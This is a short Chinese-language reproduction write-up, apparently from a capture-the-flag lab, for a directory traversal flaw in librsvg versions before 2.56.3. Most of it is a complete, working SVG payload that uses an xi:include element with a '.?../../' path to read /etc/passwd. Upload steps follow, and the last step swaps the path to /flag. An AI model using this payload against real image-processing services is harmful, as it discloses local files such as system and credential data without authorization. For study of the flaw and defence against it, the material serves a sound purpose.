一、漏洞概述
一个在 librsvg 2.56.3 之前版本中 URL 解码器的目录遍历问题,可以被本地或远程攻击者用来泄露文件(在预期区域之外的本地文件系统上),例如通过在 xi:include 元素中使用 href=".?../../../../../../../../../../etc/passwd" 来读取结果。
二、影响范围
librsvg < 2.56.3
三、访问页面
四、漏洞复现
1、制作payload,xxe.svg文件
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="1000" height="1000" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="600" height="600" style="fill:rgb(255,255,255);" />
<text x="10" y="100">
<xi:include href=".?../../../../../../../../etc/passwd" parse="text"
encoding="UTF-8">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
2、在页面中上传
3、获取flag,修改xxe.svg文件中的/etc/passwd为/flag再上传。